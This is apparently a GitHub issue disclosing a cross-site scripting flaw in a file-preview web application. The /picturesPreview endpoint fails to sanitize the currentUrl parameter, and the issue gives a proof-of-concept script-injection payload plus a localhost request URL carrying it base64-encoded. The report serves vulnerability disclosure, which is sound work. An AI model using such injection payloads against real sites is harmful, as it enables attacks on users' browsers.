
Cross-site scripting vulnerability

Open S2eTo opened this issue 2 years ago • 0 comments

Unauthorized API: @GetMapping("/picturesPreview") applies no XSS (cross-site scripting) defense to the parameter currentUrl, resulting in a cross-site scripting vulnerability.

Controller: cn.keking.web.controller.OnlinePreviewController#picturesPreview
Template: src/main/resources/web/picture.ftl

Attack:

currentUrl=http://");alert(1);//
http://127.0.0.1:8012/picturesPreview?urls=&currentUrl=aHR0cDovLyIpO2FsZXJ0KDEpOy8v


S2eTo, Dec 05 '22 03:12